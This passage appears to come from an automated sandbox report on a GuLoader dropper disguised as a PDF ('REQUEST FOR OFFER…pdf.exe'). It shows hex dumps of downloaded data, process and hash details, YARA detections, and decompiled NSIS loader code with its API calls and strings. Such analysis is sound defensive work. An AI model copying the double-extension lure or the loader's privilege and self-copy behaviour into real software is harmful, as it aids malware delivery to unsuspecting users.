.e}D%~P43:fB}Onj\|&B;S3hcQ9yTP6`kleb>%At-Y)XPAnB6W;%UxlhvRyE~<\|zWN3;Zz;:7+22<Xi't.DW[(^\E
2022-11-29 23:31:36 UTC	103	IN	Data Raw: c3 40 ec 20 0b 47 47 03 b9 0e a5 6a 11 ff 3f 13 c2 4f 49 10 64 4a 88 9a 1d 36 9d 5c 46 0b 97 e4 1c 61 f8 0b 94 d8 42 3f aa 1b 54 60 39 b7 d6 af 60 d5 2f 2b 6b 92 28 df 0d e8 26 06 a2 5a 6f 97 72 e9 65 e5 59 95 39 71 6d a4 50 26 f1 1e 4d 84 4f 65 48 5f 5f 57 7b 46 27 eb 67 5f 4a 9e c5 6d 27 09 33 0b 85 6f 4b cf 1b 73 b1 71 ad c9 6a 0c 61 ce 91 6a 35 ad d0 68 0f ef 35 72 c2 23 bd 4c 77 73 ed 74 a9 2a a1 ac da 81 d0 c0 1e 23 9b 5f 31 1a b1 3c 2e bd a6 78 2d 67 ea ed 7a 4f 4b ee 7b 63 64 2a 57 3f 22 a1 1a 95 4c 76 dd b0 ac b2 dc 1a 71 a9 12 8f 38 f3 72 7c ed ef e5 46 71 ab e0 b5 a1 f9 97 fe bf 24 07 9b 5b cc 22 33 fc c8 76 dc 06 21 4e a3 c9 6b 66 f8 44 3d 94 49 87 ff cf f8 37 ae a7 47 0b 8e 0f 6c 1e 1e d9 a6 d0 e1 4a 6f 0e 34 ca 5e c8 3f 3b aa 99 08 b6 a1 02 Data Ascii: @ GGj?OIdJ6\FaB?T`9`/+k(&ZoreY9qmP&MOeH__W{F'g_Jm'3oKsqjaj5h5r#Lwst#_1<.x-gzOK{cdW?"Lvq8r\|Fq$["3v!NkfD=I7GlJo4^?;
2022-11-29 23:31:36 UTC	104	IN	Data Raw: d1 6c ad ed 68 06 76 52 d1 79 e0 45 7e 3c c3 c6 10 80 bd 7c cc 7a 57 ac 0e 4e 03 33 a5 3b 0c 93 02 5a 7a 07 af f9 3b 90 85 fa a6 bd 3a d9 14 fa f1 37 2b 0c da 32 32 8a 11 cc 3c f9 1e 58 b4 69 27 8f d7 ac 74 a2 83 13 19 b1 2e 44 8d c7 91 90 d7 57 f0 82 b9 5b a5 dc a1 ca 1e 1f a9 28 a0 8b aa 9a 5e 88 f8 84 e3 e6 e2 df 97 ad 8b c9 5c 00 0f fc d4 1f cb 45 4c 6d a3 2b d5 91 2f c1 5a 75 04 c4 c0 5e c1 65 20 2c bb 7c f4 f1 34 f0 38 e3 12 bc 84 58 09 d7 c9 2f db 29 97 bf 1f 85 ad ed 66 5a a1 97 6f 63 a9 c3 f6 c8 f2 37 b5 5f 9b 98 3c 5b 40 6e 9a 18 6d 82 2c 3a f7 92 d1 4f e9 69 88 f0 26 a9 04 58 b5 18 eb 61 1f b3 da 5a 7b 2e b0 a2 b3 6d e7 ac 0b 93 1c 08 6a 74 4c ae f4 42 af bf d3 e1 5c c9 46 38 36 db 43 a9 78 8a e4 9b c3 b1 d0 9a 68 c9 99 08 5b c8 ed a4 18 26 8d Data Ascii: lhvRyE~<\|zWN3;Zz;:7+22<Xi't.DW[(^\ELm+/Zu^e ,\|48X/)fZoc7_<[@nm,:Oi&XaZ{.mjtLB\F86Cxh[&
2022-11-29 23:31:36 UTC	105	IN	Data Raw: 81 d0 c0 1e 23 9b 5f 31 1a b1 3c 2e bd a6 78 2d 67 ea ed 7a 4f 4b ee 7b 63 64 2a 57 3f 22 a1 1a 95 4c 76 dd b0 ac b2 dc 1a 71 a9 12 8f 38 f3 72 7c ed ef e5 46 71 ab e0 b5 a1 f9 97 fe bf 24 07 9b 5b cc 22 33 fc c8 76 dc 06 21 4e a3 c9 6b 66 f8 44 3d 94 49 87 ff cf f8 37 ae a7 47 0b 8e 0f 6c 1e 1e d9 a6 d0 e1 4a 6f 0e 34 ca 5e c8 3f 3b aa 99 08 b6 a1 02 82 49 f3 3f 83 d0 c4 74 24 f6 4e f1 3d 16 7d 0a 94 3b c8 18 50 0f c2 6e 4a 65 58 9c d8 cc 2a eb 3a f8 7c 59 2a 43 8e 16 b4 41 52 cb 7a 5e e7 bd 6f 2f 7b ee 16 e3 0c c8 68 e8 c4 2c b2 21 14 90 42 c1 ae c7 bd 10 74 aa b1 b6 ee 1c 2e 65 a8 a7 cc 7d 44 25 df 7e 08 50 cd 83 1f f6 b9 34 ca 33 3a eb 66 d8 42 7d 4f b8 6e 6a 1e 9c c7 b7 a6 f4 1c 0a e7 7c cf 26 09 05 42 92 3b 53 03 d7 33 c7 1f 68 87 63 f5 04 51 39 79 Data Ascii: #_1<.x-gzOK{cdW?"Lvq8r\|Fq$["3v!NkfD=I7GlJo4^?;I?t$N=};PnJeX:\|Y*CARz^o/{h,!Bt.e}D%~P43:fB}Onj\|&B;S3hcQ9y
2022-11-29 23:31:36 UTC	106	IN	Data Raw: 7c f4 f1 34 f0 38 e3 12 bc 84 58 09 d7 c9 2f db 29 97 bf 1f 85 ad ed 66 5a a1 97 6f 63 a9 c3 f6 c8 f2 37 b5 5f 9b 98 3c 5b 40 6e 9a 18 6d 82 2c 3a f7 92 d1 4f e9 69 88 f0 26 a9 04 58 b5 18 eb 61 1f b3 da 5a 7b 2e b0 a2 b3 6d e7 ac 0b 93 1c 08 6a 74 4c ae f4 42 af bf d3 e1 5c c9 46 38 36 db 43 a9 78 8a e4 9b c3 b1 d0 9a 68 c9 99 08 5b c8 ed a4 18 26 8d d6 ec 70 3b 61 0b 50 97 ee 9b a4 49 5a 4e c3 4e 58 2c d6 17 8b db 3a 0f 17 ef 4c ac 9b 89 a4 d1 94 04 9d 05 44 3a e5 02 78 1f 12 2d 69 4b 15 93 74 fe 75 ce e2 62 75 e3 ae aa 8c b6 99 97 ac 4d b6 fb a7 06 51 db c0 c3 40 ec 20 0b 47 47 03 b9 0e a5 6a 11 ff 3f 13 c2 4f 49 10 64 4a 88 9a 1d 36 9d 5c 46 0b 97 e4 1c 61 f8 0b 94 d8 42 3f aa 1b 54 60 39 b7 d6 af 60 d5 2f 2b 6b 92 28 df 0d e8 26 06 a2 5a 6f 97 72 e9 Data Ascii: \|48X/)fZoc7_<[@nm,:Oi&XaZ{.mjtLB\F86Cxh[&p;aPIZNNX,:LD:x-iKtubuMQ@ GGj?OIdJ6\FaB?T`9`/+k(&Zor
2022-11-29 23:31:36 UTC	107	IN	Data Raw: 18 50 0f c2 6e 4a 65 58 9c d8 cc 2a eb 3a f8 7c 59 2a 43 8e 16 b4 41 52 cb 7a 5e e7 bd 6f 2f 7b ee 16 e3 0c c8 68 e8 c4 2c b2 21 14 90 42 c1 ae c7 bd 10 74 aa b1 b6 ee 1c 2e 65 a8 a7 cc 7d 44 25 df 7e 08 50 cd 83 1f f6 b9 34 ca 33 3a eb 66 d8 42 7d 4f b8 6e 6a 1e 9c c7 b7 a6 f4 1c 0a e7 7c cf 26 09 05 42 92 3b 53 03 d7 33 c7 1f 68 87 63 f5 04 51 39 79 54 50 df a3 36 15 60 6b c9 eb 8a 12 6c be a8 d0 a9 8e 91 d1 65 09 62 a5 e7 dc bc bf e6 12 d8 f3 3e 25 16 1c 41 83 9e ba 74 02 c0 2d ab ab bb ae 59 fc 29 be 58 02 a9 50 f2 41 85 6e 09 42 36 b8 57 a0 0e 3b 25 55 78 d1 6c ad ed 68 06 76 52 d1 79 e0 45 7e 3c c3 c6 10 80 bd 7c cc 7a 57 ac 0e 4e 03 33 a5 3b 0c 93 02 5a 7a 07 af f9 3b 90 85 fa a6 bd 3a d9 14 fa f1 37 2b 0c da 32 32 8a 11 cc 3c f9 1e 58 b4 69 27 8f Data Ascii: PnJeX:\|YCARz^o/{h,!Bt.e}D%~P43:fB}Onj\|&B;S3hcQ9yTP6`kleb>%At-Y)XPAnB6W;%UxlhvRyE~<\|zWN3;Zz;:7+22<Xi'
2022-11-29 23:31:36 UTC	109	IN	Data Raw: 17 8b db 3a 0f 17 ef 4c ac 9b 89 a4 d1 94 04 9d 05 44 3a e5 02 78 1f 12 2d 69 4b 15 93 74 fe 75 ce e2 62 75 e3 ae aa 8c b6 99 97 ac 4d b6 fb a7 06 51 db c0 c3 40 ec 20 0b 47 47 03 b9 0e a5 6a 11 ff 3f 13 c2 4f 49 10 64 4a 88 9a 1d 36 9d 5c 46 0b 97 e4 1c 61 f8 0b 94 d8 42 3f aa 1b 54 60 39 b7 d6 af 60 d5 2f 2b 6b 92 28 df 0d e8 26 06 a2 5a 6f 97 72 e9 65 e5 59 95 39 71 6d a4 50 26 f1 1e 4d 84 4f 65 48 5f 5f 57 7b 46 27 eb 67 5f 4a 9e c5 6d 27 09 33 0b 85 6f 4b cf 1b 73 b1 71 ad c9 6a 0c 61 ce 91 6a 35 ad d0 68 0f ef 35 72 c2 23 bd 4c 77 73 ed 74 a9 2a a1 ac da 81 d0 c0 1e 23 9b 5f 31 1a b1 3c 2e bd a6 78 2d 67 ea ed 7a 4f 4b ee 7b 63 64 2a 57 3f 22 a1 1a 95 4c 76 dd b0 ac b2 dc 1a 71 a9 12 8f 38 f3 72 7c ed ef e5 46 71 ab e0 b5 a1 f9 97 fe bf 24 07 9b 5b Data Ascii: :LD:x-iKtubuMQ@ GGj?OIdJ6\FaB?T`9`/+k(&ZoreY9qmP&MOeH__W{F'g_Jm'3oKsqjaj5h5r#Lwst#_1<.x-gzOK{cdW?"Lvq8r\|Fq$[

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exePID: 4112, Parent PID: 4652

General

Target ID:	2
Start time:	00:31:01
Start date:	30/11/2022
Path:	C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
Imagebase:	0x400000
File size:	194987 bytes
MD5 hash:	B9F70F4146B846179FA182AC868D0C15
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000002.00000002.54385682867.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exePID: 7568, Parent PID: 4112

General

Target ID:	5
Start time:	00:31:18
Start date:	30/11/2022
Path:	C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
Imagebase:	0x400000
File size:	194987 bytes
MD5 hash:	B9F70F4146B846179FA182AC868D0C15
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000000.54201456373.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 1144, Parent PID: 7568

General

Target ID:	8
Start time:	00:31:37
Start date:	30/11/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 1980
Imagebase:	0x520000
File size:	482640 bytes
MD5 hash:	40A149513D721F096DDF50C04DA2F01F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exePID: 4112, Parent PID: 4652COMMON

Execution Graph

Execution Coverage:	11.8%
Dynamic/Decrypted Code Coverage:	8.9%
Signature Coverage:	23.2%
Total number of Nodes:	1713
Total number of Limit Nodes:	52

Executed Functions

Function 0040344A Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 401
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			_entry_() {
				intOrPtr _t54;
				WCHAR* _t58;
				char* _t61;
				void* _t64;
				void* _t66;
				int _t68;
				int _t70;
				int _t73;
				intOrPtr* _t74;
				int _t75;
				int _t77;
				void* _t101;
				signed int _t118;
				void* _t121;
				void* _t126;
				intOrPtr _t145;
				intOrPtr _t146;
				intOrPtr* _t147;
				int _t149;
				void* _t152;
				int _t153;
				signed int _t157;
				signed int _t162;
				signed int _t167;
				void* _t169;
				void* _t171;
				int* _t173;
				signed int _t179;
				signed int _t182;
				CHAR* _t183;
				WCHAR* _t184;
				void* _t190;
				char* _t191;
				void* _t194;
				void* _t195;
				void* _t238;

				_t169 = 0x20;
				_t149 = 0;
				 *(_t195 + 0x14) = 0;
				 *(_t195 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t195 + 0x1c) = 0;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t147 = E004065EC(0);
					if(_t147 != 0) {
						 *_t147(0xc00);
					}
				}
				_t183 = "UXTHEME";
				do {
					E0040657C(_t183); // executed
					_t183 =  &(_t183[lstrlenA(_t183) + 1]);
				} while ( *_t183 != 0);
				E004065EC(9);
				_t54 = E004065EC(7);
				 *0x42a244 = _t54;
				__imp__#17(_t190);
				__imp__OleInitialize(_t149); // executed
				 *0x42a2f8 = _t54;
				SHGetFileInfoW(0x4216e8, _t149, _t195 + 0x34, 0x2b4, _t149); // executed
				E00406212(0x429240, L"NSIS Error");
				_t58 = GetCommandLineW();
				_t191 = L"\"C:\\Users\\Arthur\\Desktop\\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe\"";
				E00406212(_t191, _t58);
				 *0x42a240 = GetModuleHandleW(_t149);
				_t61 = _t191;
				if(L"\"C:\\Users\\Arthur\\Desktop\\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe\"" == 0x22) {
					_t61 =  &M00435002;
					_t169 = 0x22;
				}
				_t153 = CharNextW(E00405BF3(_t61, _t169));
				 *(_t195 + 0x18) = _t153;
				_t64 =  *_t153;
				if(_t64 == _t149) {
					L30:
					_t184 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
					GetTempPathW(0x400, _t184);
					_t66 = E00403419(_t153, 0);
					_t220 = _t66;
					if(_t66 != 0) {
						L33:
						DeleteFileW(L"1033"); // executed
						_t68 = E00402ED5(_t222,  *(_t195 + 0x1c)); // executed
						 *(_t195 + 0x10) = _t68;
						if(_t68 != _t149) {
							L45:
							E00403969();
							__imp__OleUninitialize();
							_t234 =  *(_t195 + 0x10) - _t149;
							if( *(_t195 + 0x10) == _t149) {
								__eflags =  *0x42a2d4 - _t149;
								if( *0x42a2d4 == _t149) {
									L69:
									_t70 =  *0x42a2ec;
									__eflags = _t70 - 0xffffffff;
									if(_t70 != 0xffffffff) {
										 *(_t195 + 0x10) = _t70;
									}
									ExitProcess( *(_t195 + 0x10));
								}
								_t73 = OpenProcessToken(GetCurrentProcess(), 0x28, _t195 + 0x14);
								__eflags = _t73;
								if(_t73 != 0) {
									LookupPrivilegeValueW(_t149, L"SeShutdownPrivilege", _t195 + 0x20);
									 *(_t195 + 0x34) = 1;
									 *(_t195 + 0x40) = 2;
									AdjustTokenPrivileges( *(_t195 + 0x28), _t149, _t195 + 0x24, _t149, _t149, _t149);
								}
								_t74 = E004065EC(4);
								__eflags = _t74 - _t149;
								if(_t74 == _t149) {
									L67:
									_t75 = ExitWindowsEx(2, 0x80040002);
									__eflags = _t75;
									if(_t75 != 0) {
										goto L69;
									}
									goto L68;
								} else {
									_t77 =  *_t74(_t149, _t149, _t149, 0x25, 0x80040002);
									__eflags = _t77;
									if(_t77 == 0) {
										L68:
										E0040140B(9);
										goto L69;
									}
									goto L67;
								}
							}
							E00405957( *(_t195 + 0x10), 0x200010);
							ExitProcess(2);
						}
						if( *0x42a25c == _t149) {
							L44:
							 *0x42a2ec =  *0x42a2ec | 0xffffffff;
							 *(_t195 + 0x14) = E00403A5B( *0x42a2ec);
							goto L45;
						}
						_t173 = E00405BF3(_t191, _t149);
						if(_t173 < _t191) {
							L41:
							_t231 = _t173 - _t191;
							 *(_t195 + 0x10) = L"Error launching installer";
							if(_t173 < _t191) {
								_t171 = E004058DA(_t234);
								lstrcatW(_t184, L"~nsu");
								if(_t171 != _t149) {
									lstrcatW(_t184, "A");
								}
								lstrcatW(_t184, L".tmp");
								_t193 = L"C:\\Users\\Arthur\\Desktop";
								if(lstrcmpiW(_t184, L"C:\\Users\\Arthur\\Desktop") != 0) {
									_push(_t184);
									if(_t171 == _t149) {
										E004058BD();
									} else {
										E00405840();
									}
									SetCurrentDirectoryW(_t184);
									_t238 = L"C:\\Users\\Arthur\\AppData\\Local\\Folkedansens\\Suffigere\\Glaucophane" - _t149; // 0x43
									if(_t238 == 0) {
										E00406212(L"C:\\Users\\Arthur\\AppData\\Local\\Folkedansens\\Suffigere\\Glaucophane", _t193);
									}
									E00406212(0x42b000,  *(_t195 + 0x18));
									_t154 = "A" & 0x0000ffff;
									 *0x42b800 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
									_t194 = 0x1a;
									do {
										E00406234(_t149, 0x420ee8, _t184, 0x420ee8,  *((intOrPtr*)( *0x42a250 + 0x120)));
										DeleteFileW(0x420ee8);
										if( *(_t195 + 0x10) != _t149 && CopyFileW(L"C:\\Users\\Arthur\\Desktop\\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe", 0x420ee8, 1) != 0) {
											E004060B3(_t154, 0x420ee8, _t149);
											E00406234(_t149, 0x420ee8, _t184, 0x420ee8,  *((intOrPtr*)( *0x42a250 + 0x124)));
											_t101 = E004058F2(0x420ee8);
											if(_t101 != _t149) {
												CloseHandle(_t101);
												 *(_t195 + 0x10) = _t149;
											}
										}
										 *0x42b800 =  *0x42b800 + 1;
										_t194 = _t194 - 1;
									} while (_t194 != 0);
									E004060B3(_t154, _t184, _t149);
								}
								goto L45;
							}
							 *_t173 = _t149;
							_t174 =  &(_t173[2]);
							if(E00405CCE(_t231,  &(_t173[2])) == 0) {
								goto L45;
							}
							E00406212(L"C:\\Users\\Arthur\\AppData\\Local\\Folkedansens\\Suffigere\\Glaucophane", _t174);
							E00406212(L"C:\\Users\\Arthur\\AppData\\Local\\Folkedansens\\Suffigere\\Glaucophane", _t174);
							 *(_t195 + 0x10) = _t149;
							goto L44;
						}
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_t157 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
						_t118 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t162 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
						while( *_t173 != _t157 || _t173[1] != _t118) {
							_t173 = _t173;
							if(_t173 >= _t191) {
								continue;
							}
							break;
						}
						_t149 = 0;
						goto L41;
					}
					GetWindowsDirectoryW(_t184, 0x3fb);
					lstrcatW(_t184, L"\\Temp");
					_t121 = E00403419(_t153, _t220);
					_t221 = _t121;
					if(_t121 != 0) {
						goto L33;
					}
					GetTempPathW(0x3fc, _t184);
					lstrcatW(_t184, L"Low");
					SetEnvironmentVariableW(L"TEMP", _t184);
					SetEnvironmentVariableW(L"TMP", _t184);
					_t126 = E00403419(_t153, _t221);
					_t222 = _t126;
					if(_t126 == 0) {
						goto L45;
					}
					goto L33;
				} else {
					goto L8;
				}
				do {
					L8:
					_t152 = 0x20;
					if(_t64 != _t152) {
						L10:
						if( *_t153 == 0x22) {
							_t153 = _t153 + 2;
							_t152 = 0x22;
						}
						if( *_t153 != 0x2f) {
							goto L24;
						} else {
							_t153 = _t153 + 2;
							if( *_t153 == 0x53) {
								_t146 =  *((intOrPtr*)(_t153 + 2));
								if(_t146 == 0x20 || _t146 == 0) {
									 *0x42a2e0 = 1;
								}
							}
							asm("cdq");
							asm("cdq");
							_t167 = L"NCRC" & 0x0000ffff;
							asm("cdq");
							_t179 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t167;
							if( *_t153 == (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t167) &&  *((intOrPtr*)(_t153 + 4)) == _t179) {
								_t145 =  *((intOrPtr*)(_t153 + 8));
								if(_t145 == 0x20 || _t145 == 0) {
									 *(_t195 + 0x1c) =  *(_t195 + 0x1c) | 0x00000004;
								}
							}
							asm("cdq");
							asm("cdq");
							_t162 = L" /D=" & 0x0000ffff;
							asm("cdq");
							_t182 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t162;
							if( *(_t153 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t162) ||  *_t153 != _t182) {
								goto L24;
							} else {
								 *(_t153 - 4) =  *(_t153 - 4) & 0x00000000;
								__eflags = _t153;
								E00406212(L"C:\\Users\\Arthur\\AppData\\Local\\Folkedansens\\Suffigere\\Glaucophane", _t153);
								L29:
								_t149 = 0;
								goto L30;
							}
						}
					} else {
						goto L9;
					}
					do {
						L9:
						_t153 = _t153 + 2;
					} while ( *_t153 == _t152);
					goto L10;
					L24:
					_t153 = E00405BF3(_t153, _t152);
					if( *_t153 == 0x22) {
						_t153 = _t153 + 2;
					}
					_t64 =  *_t153;
				} while (_t64 != 0);
				goto L29;
			}

0x00403455
0x00403456
0x0040345d
0x00403461
0x00403469
0x0040346d
0x0040347d
0x00403480
0x00403487
0x0040348e
0x0040348e
0x00403487
0x00403490
0x00403495
0x00403496
0x004034a2
0x004034a6
0x004034ae
0x004034b5
0x004034ba
0x004034bf
0x004034c6
0x004034cc
0x004034e2
0x004034f2
0x004034f7
0x004034fd
0x00403504
0x00403518
0x0040351d
0x0040351f
0x00403523
0x00403528
0x00403528
0x00403537
0x00403539
0x0040353d
0x00403543
0x0040365a
0x00403660
0x0040366b
0x0040366d
0x00403672
0x00403674
0x004036cc
0x004036d1
0x004036db
0x004036e2
0x004036e6
0x00403797
0x00403797
0x0040379c
0x004037a2
0x004037a7
0x004038cd
0x004038d3
0x00403951
0x00403951
0x00403956
0x00403959
0x0040395b
0x0040395b
0x00403963
0x00403963
0x004038e3
0x004038e9
0x004038eb
0x004038f8
0x0040390b
0x00403913
0x0040391b
0x0040391b
0x00403923
0x00403928
0x0040392f
0x0040393d
0x00403940
0x00403946
0x00403948
0x00000000
0x00000000
0x00000000
0x00403931
0x00403937
0x00403939
0x0040393b
0x0040394a
0x0040394c
0x00000000
0x0040394c
0x00000000
0x0040393b
0x0040392f
0x004037b6
0x004037bd
0x004037bd
0x004036f2
0x00403787
0x00403787
0x00403793
0x00000000
0x00403793
0x004036ff
0x00403703
0x00403751
0x00403751
0x00403753
0x0040375b
0x004037ce
0x004037d0
0x004037d7
0x004037df
0x004037df
0x004037ea
0x004037ef
0x004037fe
0x00403802
0x00403803
0x0040380c
0x00403805
0x00403805
0x00403805
0x00403812
0x00403818
0x0040381f
0x00403827
0x00403827
0x00403835
0x00403841
0x0040384f
0x00403854
0x0040385a
0x00403866
0x0040386c
0x00403876
0x0040388c
0x0040389d
0x004038a3
0x004038aa
0x004038ad
0x004038b3
0x004038b3
0x004038aa
0x004038b7
0x004038be
0x004038be
0x004038c3
0x004038c3
0x00000000
0x004037fe
0x0040375d
0x00403760
0x0040376b
0x00000000
0x00000000
0x00403773
0x0040377e
0x00403783
0x00000000
0x00403783
0x0040370c
0x00403724
0x00403735
0x00403736
0x0040373a
0x0040373c
0x0040374a
0x0040374d
0x00000000
0x00000000
0x00000000
0x0040374d
0x0040374f
0x00000000
0x0040374f
0x0040367c
0x00403688
0x0040368d
0x00403692
0x00403694
0x00000000
0x00000000
0x0040369c
0x004036a4
0x004036b5
0x004036bd
0x004036bf
0x004036c4
0x004036c6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00403549
0x00403549
0x0040354b
0x0040354f
0x00403558
0x0040355c
0x00403561
0x00403562
0x00403562
0x00403567
0x00000000
0x0040356d
0x0040356e
0x00403573
0x00403575
0x0040357d
0x00403584
0x00403584
0x0040357d
0x00403595
0x004035a8
0x004035a9
0x004035be
0x004035c3
0x004035c7
0x004035d0
0x004035d8
0x004035df
0x004035df
0x004035d8
0x004035eb
0x004035fe
0x004035ff
0x00403614
0x0040361a
0x0040361e
0x00000000
0x00403645
0x00403645
0x0040364a
0x00403653
0x00403658
0x00403658
0x00000000
0x00403658
0x0040361e
0x00000000
0x00000000
0x00000000
0x00403551
0x00403551
0x00403552
0x00403553
0x00000000
0x00403626
0x0040362d
0x00403633
0x00403636
0x00403636
0x00403637
0x0040363a
0x00000000

APIs

SetErrorMode.KERNELBASE ref: 0040346D
GetVersion.KERNEL32 ref: 00403473
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040349C
#17.COMCTL32(00000007,00000009), ref: 004034BF
OleInitialize.OLE32(00000000), ref: 004034C6
SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 004034E2
GetCommandLineW.KERNEL32(00429240,NSIS Error), ref: 004034F7
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe",00000000), ref: 0040350A
CharNextW.USER32(00000000,"C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe",00000020), ref: 00403531

Part of subcall function 004065EC: GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
Part of subcall function 004065EC: GetProcAddress.KERNEL32(00000000,?), ref: 00406619

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040366B
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040367C
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403688
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040369C
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004036A4
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004036B5
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004036BD
DeleteFileW.KERNELBASE(1033), ref: 004036D1

Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F

OleUninitialize.OLE32(?), ref: 0040379C
ExitProcess.KERNEL32 ref: 004037BD
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 004037D0
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 004037DF
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 004037EA
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe",00000000,?), ref: 004037F6
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403812
DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,?), ref: 0040386C
CopyFileW.KERNEL32(C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe,00420EE8,00000001), ref: 00403880
CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000), ref: 004038AD
GetCurrentProcess.KERNEL32(00000028,?), ref: 004038DC
OpenProcessToken.ADVAPI32(00000000), ref: 004038E3
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038F8
AdjustTokenPrivileges.ADVAPI32 ref: 0040391B
ExitWindowsEx.USER32(00000002,80040002), ref: 00403940
ExitProcess.KERNEL32 ref: 00403963

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403461
Low, xrefs: 0040369E
C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane, xrefs: 0040364E, 0040376E, 00403818, 00403822
C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane, xrefs: 00403779
UXTHEME, xrefs: 00403490, 00403495, 0040349B
"C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe", xrefs: 004034FD, 00403503, 004036F9
NSIS Error, xrefs: 004034E8
SeShutdownPrivilege, xrefs: 004038F2
.tmp, xrefs: 004037E4
TEMP, xrefs: 004036B0
Error launching installer, xrefs: 00403753
C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, xrefs: 0040387B
1033, xrefs: 004036CC
C:\Users\user\Desktop, xrefs: 004037EF, 004037F4, 00403821
C:\Users\user\AppData\Local\Temp\, xrefs: 00403660, 00403665, 0040367B, 00403687, 00403696, 004036A3, 004036AF, 004036B7, 004037CD, 004037DE, 004037E9, 004037F5, 00403802, 00403811, 004038C2
~nsu, xrefs: 004037C8
TMP, xrefs: 004036B8
\Temp, xrefs: 00403682

Memory Dump Source

